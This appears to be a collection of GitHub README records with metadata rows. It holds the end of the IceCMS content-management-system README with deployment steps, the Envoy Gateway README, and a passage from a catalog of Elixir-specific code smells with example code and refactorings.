<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829099/63d19ee6e070e_meudqj.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829121/63d19ee4b609d_pt54fj.png" width = “50%”>
</div>
## 后台
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237058/Screenshot_2024-03-12_at_17.48.51_el9tcs.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237057/Screenshot_2024-03-12_at_17.49.02_eioj84.png" width = “50%”>
</div>
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1710237060/Screenshot_2024-03-12_at_17.49.12_x7aotb.png" width = “50%”>
</div>
## UniApp H5、小程序移动端
<img alt="describe" src="https://i0.hdslb.com/bfs/album/354a1caa29bfd8bc9571be67b18db13227bea80f.png" width="280" height="405">
## 后端
1. 核心框架:[Spring Boot](https://github.com/spring-projects/spring-boot)
2. 安全框架:[Spring Security](https://github.com/spring-projects/spring-security)
3. Token 认证:[jjwt](https://github.com/jwtk/jjwt)
4. 持久层框架:[MyBatis](https://github.com/mybatis/spring-boot-starter)
5. 分页插件:[PageHelper](https://github.com/pagehelper/Mybatis-PageHelper)
6. NoSQL缓存:[Redis](https://github.com/redis/redis)
7. Markdown 转 HTML:[commonmark-java](https://github.com/commonmark/commonmark-java)
8. 离线 IP 地址库:[ip2region](https://github.com/lionsoul2014/ip2region)
基于 JDK8 开发,8以上要添加依赖:
```xml
<dependency>
<groupId>javax.xml.bind</groupId>
<artifactId>jaxb-api</artifactId>
<version>2.3.0</version>
</dependency>
```
## 前端
核心框架:Vue2.x、Vue Router、Vuex
Vue 项目基于 @vue/cli4.x 构建
JS 依赖及参考的 css:[axios](https://github.com/axios/axios)、[moment](https://github.com/moment/moment)、[nprogress](https://github.com/rstacruz/nprogress)、[v-viewer](https://github.com/fengyuanchen/viewerjs)、[prismjs](https://github.com/PrismJS/prism)、[APlayer](https://github.com/DIYgod/APlayer)、[MetingJS](https://github.com/metowolf/MetingJS)、[lodash](https://github.com/lodash/lodash)、[mavonEditor](https://github.com/hinesboy/mavonEditor)、[echarts](https://github.com/apache/echarts)、[tocbot](https://github.com/tscanlin/tocbot)、[iCSS](https://github.com/chokcoco/iCSS)
### 后台 UI
后台 CMS 部分基于 [vue-admin-template](https://github.com/PanJiaChen/vue-admin-template)
UI 框架为 [Element UI](https://github.com/ElemeFE/element)
### 前台 UI
[Element UI](https://github.com/ElemeFE/element):部分使用,一些小组件,更改了ui样式,便于快速实现效果
## 最近更新
增加标签功能
完善部分ui
docker 前端部署方式
docker compose 一键部署
# 快速开始
Docker部署方式(推荐,可用于快速上线或测试)
# 未安装docker的请先安装docker,已经安装的跳过此步
yum install docker-ce -y
#启动docker
systemctl start docker
# 配置国内源
# 创建docker目录
sudo mkdir -p /etc/docker
# 创建配置文件
sudo tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://mirror.ccs.tencentyun.com"]
}
EOF
# 加载新的配置文件
sudo systemctl daemon-reload
# 重启docker服务
sudo systemctl restart docker
main-命令执行
Ps:按顺序执行
1.运行Mysql容器
docker run -d -p 0:3389 \
--name ice-sql \
--restart always \
thecosy/icemysql:v2.2.0
2.运行Spring容器
docker run -d -p 8181:8181 \
--name ice-api \
--restart always \
--link ice-sql:db \
thecosy/icecms:v2.2.0
3.运行Vue容器
docker run -d -p 3000:80 \
--name ice-vue \
--restart always \
--link ice-api:iceApi \
thecosy/icevue:v2.2.0
#访问前端地址http://ip:3000
## 目录结构
iceCMS/
├── HELP.md
├── IceCMS-java.iml
├── IceCMS-main --java主程序启动入口
│ ├── IceCMS-main.iml
│ ├── main.iml
│ ├── pom.xml
│ ├── src
│ └── target
├── IcePay-ment --java支付模块
│ ├── IcePay-ment.iml
│ ├── pom.xml
│ ├── src
│ └── target
├── IceWk-ment --java前端api模块
│ ├── IceWk-ment.iml
│ ├── pom.xml
│ ├── src
│ └── target
├── IceWk-uniApp --h5Uniapp模块
│ ├── App.vue
│ ├── LICENSE
│ ├── components
│ ├── main.js
│ ├── manifest.json
│ ├── nPro
│ ├── package-lock.json
│ ├── package.json
│ ├── pages
│ ├── pages.json
│ ├── static
│ ├── store
│ ├── subPage
│ ├── template.h5.html
│ ├── theme
│ ├── uni.scss
│ ├── uni_modules
│ ├── utils
│ └── vue.config.js
├── IceWk-vues --前端vue模块
│ ├── LICENSE
│ ├── README.md
│ ├── babel.config.js
│ ├── build
│ ├── dist
│ ├── jest.config.js
│ ├── jsconfig.json
│ ├── node_modules
│ ├── package-lock.json
│ ├── package.json
│ ├── postcss.config.js
│ ├── public
│ ├── serverless.yml
│ ├── src
│ ├── vue.config.js
│ └── yarn.lock
├── README.md
├── bin
│ ├── clean.bat
│ ├── package.bat
│ └── run.bat
├── doc
│ └── IceCMS环境使用手册.docx
├── mvnw
├── mvnw.cmd
├── pom.xml
└── sql --项目sql文件
├── icecms5.6.sql
└── icecms8.0.sql
## <strong>配置最小开发环境</strong>
1.环境配置
MySQL
JDK1.8或以上
Maven
Nodejs
微信开发者工具
### <strong>后端部署</strong>
2.创建 MySQL 数据库`IceCMS`,并执行`/sql/IceCMS.sql`初始化表数据
3.启动iceCMS-main管理后台的后端服务
3.1.修改配置信息`IceCMS-main/src/main/resources/application.yml`配置数据库连接
3.2.安装 Redis 并启动(不用的话不影响)
3.3.打开命令行,输入以下命令
cd iceCMS
mvn install
mvn clean package
java -Dfile.encoding=UTF-8 -jar iceCMS/iceCMS-main/target/iceCMS.jar
#在iceCMS.jar目录输入 java -jar iceCMS.jar
### <strong>前端部署</strong>
4.进入iceCMS-vues目录
打开命令行,输入以下命令
```bash
# 克隆项目
git clone https://github.com/PanJiaChen/vue-admin-template.git
# 进入项目目录
cd IceWk-VUE
# 安装依赖
npm install
# 建议不要直接使用 cnpm 安装以来,会有各种诡异的 bug。可以通过如下操作解决 npm 下载速度慢的问题
npm install --legacy-peer-deps --registry=https://registry.npm.taobao.org
# 启动服务
npm run dev
```
### 发布
```bash
# 构建测试环境
npm run build:stage
# 构建生产环境
npm run build:prod
```
5.启动前端
浏览器打开,访问 [http://localhost:9528](http://localhost:9528)
, 此时进入前端页面。
启动前端后台(后台地址http://localhost:9528/admin)
6.启动uniapp移动端
下载HBuilderX
进入([https://ext.dcloud.net.cn/plugin?id=9261](https://ext.dcloud.net.cn/plugin?id=9261))uniapp移动端插件目录,点击导入,然后即可导入到本地。
也可在本地打开IceCMS-uniapp项目
打开`IceWK-uniApp`目录,进行编译打包
## 注意事项
一些常见问题:
- MySQL 确保数据库字符集为`utf8mb4`的情况下通常没有问题(”站点设置“及”文章详情“等许多表字段需要`utf8mb4`格式字符集来支持 emoji 表情,否则在导入 sql 文件时,即使成功导入,也会有部分字段内容不完整,导致前端页面渲染数据时报错)
- 确保 Maven 能够成功导入现版本依赖,请勿升级或降低依赖版本
- 数据库中默认用户名密码为`root`,`123123`,因为是个人项目,没打算做修改密码的页面,可在`top.naccl.util.HashUtils`下的`main`方法手动生成密码存入数据库
- 注意修改IceCMS-main目录下的`application-dev.properties`的配置信息
- Redis 若没有密码,留空即可
- 注意修改`token.secretKey`,否则无法保证 token 安全性
[//]: # ( - `spring.mail.host`及`spring.mail.port`的默认配置为阿里云邮箱,其它邮箱服务商参考关键字`spring mail 服务器`(邮箱配置用于接收评论提醒))
[//]: # (## 隐藏功能)
[//]: # ()
[//]: # (- 在前台访问`/login`路径登录后,可以以博主身份(带有博主标识)回复评论,且不需要填写昵称和邮箱即可提交)
[//]: # (- 在 Markdown 中加入`<meting-js server="netease" type="song" id="歌曲id" theme="#25CCF7"></meting-js>` (注意以正文形式添加,而不是代码片段)可以在文章中添加 [APlayer](https://github.com/DIYgod/APlayer) 音乐播放器,`netease`为网易云音乐,其它配置及具体用法参考 [MetingJS](https://github.com/metowolf/MetingJS))
[//]: # (- 提供了两种隐藏文字效果:在 Markdown 中使用`@@`包住文字,文字会被渲染成“黑幕”效果,鼠标悬浮在上面时才会显示;使用`%%`包住文字,文字会被“蓝色覆盖层”遮盖,只有鼠标选中状态才会反色显示。例如:`@@隐藏文字@@`,`%%隐藏文字%%`)
[//]: # (- 大部分个性化配置可以在后台“站点设置”中修改,小部分由于考虑到首屏加载速度(如首页大图)需要修改前端源码)
## QQ交流群
QQ交流群:([951286996](https://qm.qq.com/cgi-bin/qm/qr?k=XLX0hSw6GGuOgNbC53r-Pc7Lrubwcm4q&authKey=AaNuGPfAWTSyaN6MR5yGYFQ0+4AKsZQq7kI0uRASo+v5ttyrc6xvh7gfNEMQ7UDR&noverify=0))
Tg群组:[https://t.me/+1rau4SBwFyE1OTA1](https://t.me/+1rau4SBwFyE1OTA1)
该群是一个学习交流群,如果是程序相关问题,请直接提交issues
## 软著
<div class = "half">
<img alt="describe" style="width:420px" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829207/%E7%99%BB%E8%AE%B0%E8%AF%81%E4%B9%A6_2023R11L0135975__mosaic_wgmw6p.jpg" width = “50%”>
</div>
## 开源协议
GPL-3.0 license © pipipi-pikachu
## 商业用途
* 如果你希望将本项目商用盈利,我希望你能严格遵循 GPL-3.0 协议;
* 如果你真的需要闭源商用,无法执行 GPL-3.0 协议,可以选择:
* 成为项目的贡献者,大致包括:
* 你的代码被本项目作为依赖引用;
* 你提交的 PR 被本项目合并(仅限有价值的,不包括简单的错别字或拼写错误修改等);
* 你参与过本项目的设计、实现(也包括对各种功能/模块的实现或Bug的修复提供了有价值的思路);
* 联系作者付费商用
## Thanks
感谢 [JetBrains](https://www.jetbrains.com/) 提供的非商业开源软件 License
## Star History
[![Star History Chart](https://api.star-history.com/svg?repos=Thecosy/IceCMS&type=Date)](https://star-history.com/#Thecosy/IceCMS&Date)
| 🌈冰激凌内容管理系统🍦,实现MacWK资源站,社区图片视频圈子CMS,支持网页端移动端小程序🌟适合做 资讯商城,社区论坛,聊天交友 社区,博客,圈子,论坛,图片,视频,社交。 | java,mybatis,shiro,spring-boot,uniapp,vue,springboot | 0 | 1 | 0 | 153 | 10 | 1 | 0 |
envoyproxy/gateway | # Envoy Gateway
[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/envoyproxy/gateway/badge)](https://securityscorecards.dev/viewer/?uri=github.com/envoyproxy/gateway)
[![Build and Test](https://github.com/envoyproxy/gateway/actions/workflows/build_and_test.yaml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/build_and_test.yaml)
[![codecov](https://codecov.io/gh/envoyproxy/gateway/branch/main/graph/badge.svg)](https://codecov.io/gh/envoyproxy/gateway)
[![CodeQL](https://github.com/envoyproxy/gateway/actions/workflows/codeql.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/codeql.yml)
[![OSV-Scanner](https://github.com/envoyproxy/gateway/actions/workflows/osv-scanner.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/osv-scanner.yml)
[![Trivy](https://github.com/envoyproxy/gateway/actions/workflows/trivy.yml/badge.svg)](https://github.com/envoyproxy/gateway/actions/workflows/trivy.yml)
Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or
Kubernetes-based application gateway.
[Gateway API](https://gateway-api.sigs.k8s.io) resources are used to dynamically provision and configure the managed Envoy Proxies.
## Documentation
* [Blog][blog] introducing Envoy Gateway.
* [Goals](GOALS.md)
* [Quickstart](https://gateway.envoyproxy.io/latest/tasks/quickstart/) to use Envoy Gateway in a few simple steps.
* [Roadmap](https://gateway.envoyproxy.io/contributions/roadmap/)
## Contact
* Slack: Join the [Envoy Slack workspace][] if you're not already a member. Otherwise, use the
[Envoy Gateway channel][] to start collaborating with the community.
## Contributing
* [Code of conduct](/CODE_OF_CONDUCT)
* [Contributing guide](https://gateway.envoyproxy.io/contributions/contributing/)
* [Developer guide](https://gateway.envoyproxy.io/contributions/develop/)
## Community Meeting
The Envoy Gateway team meets every Tuesday and Thursday. We also have a separate meeting to be held in the
Chinese timezone every two weeks to better accommodate our Chinese community members who
face scheduling difficulties for the weekly meetings. Please refer to the meeting details for additional information.
* [Meeting details][meeting]
[meeting]: https://docs.google.com/document/d/1leqwsHX8N-XxNEyTflYjRur462ukFxd19Rnk3Uzy55I/edit?usp=sharing
[blog]: https://blog.envoyproxy.io/introducing-envoy-gateway-ad385cc59532
[Envoy Slack workspace]: https://communityinviter.com/apps/envoyproxy/envoy
[Envoy Gateway channel]: https://envoyproxy.slack.com/archives/C03E6NHLESV
| Manages Envoy Proxy as a Standalone or Kubernetes-based Application Gateway | envoy,kubernetes,gateway-api,cncf,go-control-plane,api-gateway,hacktoberfest | 17 | 431 | 2,356 | 1,990 | 222 | 18 | 14 |
lucasvegi/Elixir-Code-Smells | # [Catalog of Elixir-specific code smells][Elixir Smells]
[![Run in Livebook](https://livebook.dev/badge/v1/black.svg)](https://livebook.dev/run?url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells%2Fblob%2Fmain%2Fcode_smells.livemd)
[![GitHub last commit](https://img.shields.io/github/last-commit/lucasvegi/Elixir-Code-Smells)](https://github.com/lucasvegi/Elixir-Code-Smells/commits/main)
[![Twitter URL](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Flucasvegi%2FElixir-Code-Smells&via=lucasvegi&text=Catalog%20of%20Elixir-specific%20code%20smells%3A&hashtags=MyElixirStatus%2CElixirLang)
## Table of Contents
* __[Introduction](#introduction)__
* __[Design-related smells](#design-related-smells)__
* [GenServer Envy](#genserver-envy)
* [Agent Obsession](#agent-obsession)
* [Unsupervised process](#unsupervised-process)
* [Large messages](#large-messages)
* [Unrelated multi-clause function](#unrelated-multi-clause-function)
* [Complex extractions in clauses](#complex-extractions-in-clauses) [^*]
* [Using exceptions for control-flow](#using-exceptions-for-control-flow)
* [Untested polymorphic behaviors](#untested-polymorphic-behaviors)
* [Code organization by process](#code-organization-by-process)
* [Large code generation by macros](#large-code-generation-by-macros) [^*]
* [Data manipulation by migration](#data-manipulation-by-migration)
* [Using App Configuration for libraries](#using-app-configuration-for-libraries)
* [Compile-time global configuration](#compile-time-global-configuration)
* ["Use" instead of "import"](#use-instead-of-import)
* __[Low-level concerns smells](#low-level-concerns-smells)__
* [Working with invalid data](#working-with-invalid-data)
* [Complex branching](#complex-branching)
* [Complex else clauses in with](#complex-else-clauses-in-with) [^*]
* [Alternative return types](#alternative-return-types) [^*]
* [Accessing non-existent map/struct fields](#accessing-non-existent-mapstruct-fields)
* [Speculative Assumptions](#speculative-assumptions)
* [Modules with identical names](#modules-with-identical-names)
* [Unnecessary macros](#unnecessary-macros)
* [Dynamic atom creation](#dynamic-atom-creation) [^**]
* __[Traditional code smells][TraditionalSmells]__
* __[About](#about)__
* __[Acknowledgments](#acknowledgments)__
[^*]: These code smells were suggested by the Elixir community.
[^**]: This code smell emerged from a study with mining software repositories (MSR).
## Introduction
[Elixir][Elixir] is a functional programming language whose popularity is rising in the industry <sup>[link][ElixirInProduction]</sup>. However, there are few works in the scientific literature focused on studying the internal quality of systems implemented in this language.
In order to better understand the types of sub-optimal code structures that can harm the internal quality of Elixir systems, we scoured websites, blogs, forums, and videos (grey literature review), looking for specific code smells for Elixir that are discussed by its developers.
As a result of this investigation, we have initially proposed a catalog of 18 new smells that are specific to Elixir systems. After that, 1 new smell emerged from a study with mining software repositories (MSR) performed by us, and other smells are being suggested by the community, so this catalog is constantly being updated __(currently 23 smells)__. These code smells are categorized into two different groups ([design-related](#design-related-smells) and [low-level concerns](#low-level-concerns-smells)), according to the type of impact and code extent they affect. This catalog of Elixir-specific code smells is presented below. Each code smell is documented using the following structure:
* __Name:__ Unique identifier of the code smell. This name is important to facilitate communication between developers;
* __Category:__ The portion of code affected by smell and its severity;
* __Problem:__ How the code smell can harm code quality and what impacts this can have for developers;
* __Example:__ Code and textual descriptions to illustrate the occurrence of the code smell;
* __Refactoring:__ Ways to change smelly code in order to improve its qualities. Examples of refactored code are presented to illustrate these changes.
In addition to the Elixir-specific code smells, our catalog also documents 12 [traditional code smells][TraditionalSmells] discussed in the context of Elixir systems.
The objective of this catalog of code smells is to instigate the improvement of the quality of code developed in Elixir. For this reason, we are interested in knowing Elixir's community opinion about these code smells: *Do you agree that these code smells can be harmful? Have you seen any of them in production code? Do you have any suggestions about some Elixir-specific code smell not cataloged by us?...*
Please feel free to make pull requests and suggestions ([Issues][Issues] tab). We want to hear from you!
[▲ back to Index](#table-of-contents)
## Design-related smells
Design-related smells are more complex, affect a coarse-grained code element, and are therefore harder to detect. In this section, 14 different smells classified as design-related are explained and exemplified:
### GenServer Envy
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, processes can be primitively created by ``Kernel.spawn/1``, ``Kernel.spawn/3``, ``Kernel.spawn_link/1`` and ``Kernel.spawn_link/3`` functions. Although it is possible to create them this way, it is more common to use abstractions (e.g., [``Agent``][Agent], [``Task``][Task], and [``GenServer``][GenServer]) provided by Elixir to create processes. The use of each specific abstraction is not a code smell in itself; however, there can be trouble when either a ``Task`` or ``Agent`` is used beyond its suggested purposes, being treated like a ``GenServer``.
* __Example:__ As shown next, ``Agent`` and ``Task`` are abstractions to create processes with specialized purposes. In contrast, ``GenServer`` is a more generic abstraction used to create processes for many different purposes:
* ``Agent``: As Elixir works on the principle of immutability, by default no value is shared between multiple places of code, enabling read and write as in a global variable. An ``Agent`` is a simple process abstraction focused on solving this limitation, enabling processes to share state.
* ``Task``: This process abstraction is used when we only need to execute some specific action asynchronously, often in an isolated way, without communication with other processes.
* ``GenServer``: This is the most generic process abstraction. The main benefit of this abstraction is explicitly segregating the server and the client roles, thus providing a better API for the organization of processes communication. Besides that, a ``GenServer`` can also encapsulate state (like an ``Agent``), provide sync and async calls (like a ``Task``), and more.
Examples of this code smell appear when ``Agents`` or ``Tasks`` are used for general purposes and not only for specialized ones such as their documentation suggests. To illustrate some smell occurrences, we will cite two specific situations. 1) When a ``Task`` is used not only to async execute an action, but also to frequently exchange messages with other processes; 2) When an ``Agent``, beside sharing some global value between processes, is also frequently used to execute isolated tasks that are not of interest to other processes.
* __Refactoring:__ When an ``Agent`` or ``Task`` goes beyond its suggested use cases and becomes painful, it is better to refactor it into a ``GenServer``.
[▲ back to Index](#table-of-contents)
___
### Agent Obsession
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, an ``Agent`` is a process abstraction focused on sharing information between processes by means of message passing. It is a simple wrapper around shared information, thus facilitating its read and update from any place in the code. The use of an ``Agent`` to share information is not a code smell in itself; however, when the responsibility for interacting directly with an ``Agent`` is spread across the entire system, this can be problematic. This bad practice can increase the difficulty of code maintenance and make the code more prone to bugs.
* __Example:__ The following code seeks to illustrate this smell. The responsibility for interacting directly with the ``Agent`` is spread across four different modules (i.e, ``A``, ``B``, ``C``, and ``D``).
```elixir
defmodule A do
#...
def update(pid) do
#...
Agent.update(pid, fn _list -> 123 end)
#...
end
end
```
```elixir
defmodule B do
#...
def update(pid) do
#...
Agent.update(pid, fn content -> %{a: content} end)
#...
end
end
```
```elixir
defmodule C do
#...
def update(pid) do
#...
Agent.update(pid, fn content -> [:atom_value | [content]] end)
#...
end
end
```
```elixir
defmodule D do
#...
def get(pid) do
#...
Agent.get(pid, fn content -> content end)
#...
end
end
```
This spreading of responsibility can generate duplicated code and make code maintenance more difficult. Also, due to the lack of control over the format of the shared data, complex composed data can be shared. This freedom to use any format of data is dangerous and can induce developers to introduce bugs.
```elixir
# start an agent with initial state of an empty list
iex(1)> {:ok, agent} = Agent.start_link fn -> [] end
{:ok, #PID<0.135.0>}
# many data format (i.e., List, Map, Integer, Atom) are
# combined through direct access spread across the entire system
iex(2)> A.update(agent)
iex(3)> B.update(agent)
iex(4)> C.update(agent)
# state of shared information
iex(5)> D.get(agent)
[:atom_value, %{a: 123}]
```
* __Refactoring:__ Instead of spreading direct access to an ``Agent`` over many places in the code, it is better to refactor this code by centralizing the responsibility for interacting with an ``Agent`` in a single module. This refactoring improves the maintainability by removing duplicated code; it also allows you to limit the accepted format for shared data, reducing bug-proneness. As shown below, the module ``KV.Bucket`` is centralizing the responsibility for interacting with the ``Agent``. Any other place in the code that needs to access shared data must now delegate this action to ``KV.Bucket``. Also, ``KV.Bucket`` now only allows data to be shared in ``Map`` format.
```elixir
defmodule KV.Bucket do
use Agent
@doc """
Starts a new bucket.
"""
def start_link(_opts) do
Agent.start_link(fn -> %{} end)
end
@doc """
Gets a value from the `bucket` by `key`.
"""
def get(bucket, key) do
Agent.get(bucket, &Map.get(&1, key))
end
@doc """
Puts the `value` for the given `key` in the `bucket`.
"""
def put(bucket, key, value) do
Agent.update(bucket, &Map.put(&1, key, value))
end
end
```
The following are examples of how to delegate access to shared data (provided by an ``Agent``) to ``KV.Bucket``.
```elixir
# start an agent through a `KV.Bucket`
iex(1)> {:ok, bucket} = KV.Bucket.start_link(%{})
{:ok, #PID<0.114.0>}
# add shared values to the keys `milk` and `beer`
iex(2)> KV.Bucket.put(bucket, "milk", 3)
iex(3)> KV.Bucket.put(bucket, "beer", 7)
# accessing shared data of specific keys
iex(4)> KV.Bucket.get(bucket, "beer")
7
iex(5)> KV.Bucket.get(bucket, "milk")
3
```
These examples are based on code written in Elixir's official documentation. Source: [link][AgentObsessionExample]
[▲ back to Index](#table-of-contents)
___
### Unsupervised process
* __Category:__ Design-related smell.
* __Problem:__ In Elixir, creating a process outside a supervision tree is not a code smell in itself. However, when code creates a large number of long-running processes outside a supervision tree, this can make visibility and monitoring of these processes difficult, preventing developers from fully controlling their applications.
* __Example:__ The following code example seeks to illustrate a library responsible for maintaining a numerical ``Counter`` through a ``GenServer`` process outside a supervision tree. Multiple counters can be created simultaneously by a client (one process for each counter), making these unsupervised processes difficult to manage. This can cause problems with the initialization, restart, and shutdown of a system.
```elixir
defmodule Counter do
use GenServer
@moduledoc """
Global counter implemented through a GenServer process
outside a supervision tree.
"""
@doc """
Function to create a counter.
initial_value: any integer value.
pid_name: optional parameter to define the process name.
Default is Counter.
"""
def start(initial_value, pid_name \\ __MODULE__)
when is_integer(initial_value) do
GenServer.start(__MODULE__, initial_value, name: pid_name)
end
@doc """
Function to get the counter's current value.
pid_name: optional parameter to inform the process name.
Default is Counter.
"""
def get(pid_name \\ __MODULE__) do
GenServer.call(pid_name, :get)
end
@doc """
Function to changes the counter's current value.
Returns the updated value.
value: amount to be added to the counter.
pid_name: optional parameter to inform the process name.
Default is Counter.
"""
def bump(value, pid_name \\ __MODULE__) do
GenServer.call(pid_name, {:bump, value})
get(pid_name)
end
## Callbacks
@impl true
def init(counter) do
{:ok, counter}
end
@impl true
def handle_call(:get, _from, counter) do
{:reply, counter, counter}
end
def handle_call({:bump, value}, _from, counter) do
{:reply, counter, counter + value}
end
end
#...Use examples...
iex(1)> Counter.start(0)
{:ok, #PID<0.115.0>}
iex(2)> Counter.get()
0
iex(3)> Counter.start(15, C2)
{:ok, #PID<0.120.0>}
iex(4)> Counter.get(C2)
15
iex(5)> Counter.bump(-3, C2)
12
iex(6)> Counter.bump(7)
7
```
* __Refactoring:__ To ensure that clients of a library have full control over their systems, regardless of the number of processes used and the lifetime of each one, all processes must be started inside a supervision tree. As shown below, this code uses a ``Supervisor`` <sup>[link][Supervisor]</sup> as a supervision tree. When this Elixir application is started, two different counters (``Counter`` and ``C2``) are also started as child processes of the ``Supervisor`` named ``App.Supervisor``. Both are initialized with zero. By means of this supervision tree, it is possible to manage the lifecycle of all child processes (e.g., stopping or restarting each one), improving the visibility of the entire app.
```elixir
defmodule SupervisedProcess.Application do
use Application
@impl true
def start(_type, _args) do
children = [
# The counters are Supervisor children started via Counter.start(0).
%{
id: Counter,
start: {Counter, :start, [0]}
},
%{
id: C2,
start: {Counter, :start, [0, C2]}
}
]
opts = [strategy: :one_for_one, name: App.Supervisor]
Supervisor.start_link(children, opts)
end
end
#...Use examples...
iex(1)> Supervisor.count_children(App.Supervisor)
%{active: 2, specs: 2, supervisors: 0, workers: 2}
iex(2)> Counter.get(Counter)
0
iex(3)> Counter.get(C2)
0
iex(4)> Counter.bump(7, Counter)
7
iex(5)> Supervisor.terminate_child(App.Supervisor, Counter)
iex(6)> Supervisor.count_children(App.Supervisor)
%{active: 1, specs: 2, supervisors: 0, workers: 2} #only one active
iex(7)> Counter.get(Counter) #Error because it was previously terminated
** (EXIT) no process: the process is not alive...
iex(8)> Supervisor.restart_child(App.Supervisor, Counter)
iex(9)> Counter.get(Counter) #after the restart, this process can be accessed again
0
```
These examples are based on codes written in Elixir's official documentation. Source: [link][UnsupervisedProcessExample]
[▲ back to Index](#table-of-contents)
___
### Large messages
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Large messages between processes".
* __Problem:__ In Elixir, processes run in an isolated manner, often concurrently with other. Communication between different processes is performed via message passing. The exchange of messages between processes is not a code smell in itself; however, when processes exchange messages, their contents are copied between them. For this reason, if a huge structure is sent as a message from one process to another, the sender can become blocked, compromising performance. If these large message exchanges occur frequently, the prolonged and frequent blocking of processes can cause a system to behave anomalously.
* __Example:__ The following code is composed of two modules which will each run in a different process. As the names suggest, the ``Sender`` module has a function responsible for sending messages from one process to another (i.e., ``send_msg/3``). The ``Receiver`` module has a function to create a process to receive messages (i.e., ``create/0``) and another one to handle the received messages (i.e., ``run/0``). If a huge structure, such as a list with 1_000_000 different values, is sent frequently from ``Sender`` to ``Receiver``, the impacts of this smell could be felt.
```elixir
defmodule Receiver do
@doc """
Function for receiving messages from processes.
"""
def run do
receive do
{:msg, msg_received} -> msg_received
{_, _} -> "won't match"
end
end
@doc """
Create a process to receive a message.
Messages are received in the run() function of Receiver.
"""
def create do
spawn(Receiver, :run, [])
end
end
```
```elixir
defmodule Sender do
@doc """
Function for sending messages between processes.
pid_receiver: message recipient.
msg: messages of any type and size can be sent.
id_msg: used by receiver to decide what to do
when a message arrives.
Default is the atom :msg
"""
def send_msg(pid_receiver, msg, id_msg \\ :msg) do
send(pid_receiver, {id_msg, msg})
end
end
```
Examples of large messages between processes:
```elixir
iex(1)> pid = Receiver.create
#PID<0.144.0>
#Simulating a message with large content - List with length 1_000_000
iex(2)> msg = %{from: inspect(self()), to: inspect(pid), content: Enum.to_list(1..1_000_000)}
iex(3)> Sender.send_msg(pid, msg)
{:msg,
%{
content: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, ...],
from: "#PID<0.105.0>",
to: "#PID<0.144.0>"
}}
```
This example is based on a original code by Samuel Mullen. Source: [link][LargeMessageExample]
[▲ back to Index](#table-of-contents)
___
### Unrelated multi-clause function
* __Category:__ Design-related smell.
* __Note:__ Formerly known as "Complex multi-clause function".
* __Problem:__ Using multi-clause functions in Elixir, to group functions of the same name, is not a code smell in itself. However, due to the great flexibility provided by this programming feature, some developers may abuse the number of guard clauses and pattern matches to group _unrelated_ functionality.
* __Example:__ A recurrent example of abusive use of the multi-clause functions is when we’re trying to mix too much-unrelated business logic into the function definitions. This makes it difficult to read and understand the logic involved in the functions, which may impair code maintainability. Some developers use documentation mechanisms such as ``@doc`` annotations to compensate for poor code readability, but unfortunately, with a multi-clause function, we can only use these annotations once per function name, particularly on the first or header function. As shown next, all other variations of the function need to be documented only with comments, a mechanism that cannot automate tests, leaving the code prone to bugs.
```elixir
@doc """
Update sharp product with 0 or empty count
## Examples
iex> Namespace.Module.update(...)
expected result...
"""
def update(%Product{count: nil, material: material})
when material in ["metal", "glass"] do
# ...
end
# update blunt product
def update(%Product{count: count, material: material})
when count > 0 and material in ["metal", "glass"] do
# ...
end
# update animal...
def update(%Animal{count: 1, skin: skin})
when skin in ["fur", "hairy"] do
# ...
end
```
* __Refactoring:__ As shown below, a possible solution to this smell is to break the business rules that are mixed up in a single unrelated multi-clause function in several different simple functions. Each function can have a specific ``@doc``, describing its behavior and parameters received. While this refactoring sounds simple, it can have a lot of impact on the function's current clients, so be careful!
```elixir
@doc """
Update sharp product
## Parameter
struct: %Product{...}
## Examples
iex> Namespace.Module.update_sharp_product(%Product{...})
expected result...
"""
def update_sharp_product(struct) do
# ...
end
@doc """
Update blunt product
## Parameter
struct: %Product{...}
## Examples
iex> Namespace.Module.update_blunt_product(%Product{...})
expected result...
"""
def update_blunt_product(struct) do
# ...
end
@doc """
Update animal
## Parameter
struct: %Animal{...}
## Examples
iex> Namespace.Module.update_animal(%Animal{...})
expected result...
"""
def update_animal(struct) do
# ...
end
```
This example is based on a original code by Syamil MJ ([@syamilmj][syamilmj]). Source: [link][MultiClauseExample]
[▲ back to Index](#table-of-contents)
___
### Complex extractions in clauses
* __Category:__ Design-related smell.
* __Note:__ This smell was suggested by the community via issues ([#9][Complex-extraction-in-clauses-issue]).
* __Problem:__ When we use multi-clause functions, it is possible to extract values in the clauses for further usage and for pattern matching/guard checking. This extraction itself does not represent a code smell, but when you have too many clauses or too many arguments, it becomes hard to know which extracted parts are used for pattern/guards and what is used only inside the function body. This smell is related to [Unrelated multi-clause function](#unrelated-multi-clause-function), but with implications of its own. It impairs the code readability in a different way.
* __Example:__ The following code, although simple, tries to illustrate the occurrence of this code smell. The multi-clause function ``drive/1`` is extracting fields of an ``%User{}`` struct for usage in the clause expression (e.g. ``age``) and for usage in the function body (e.g., ``name``). Ideally, a function should not mix pattern matching extractions for usage in its clauses expressions and also in the function body.
```elixir
def drive(%User{name: name, age: age}) when age >= 18 do
"#{name} can drive"
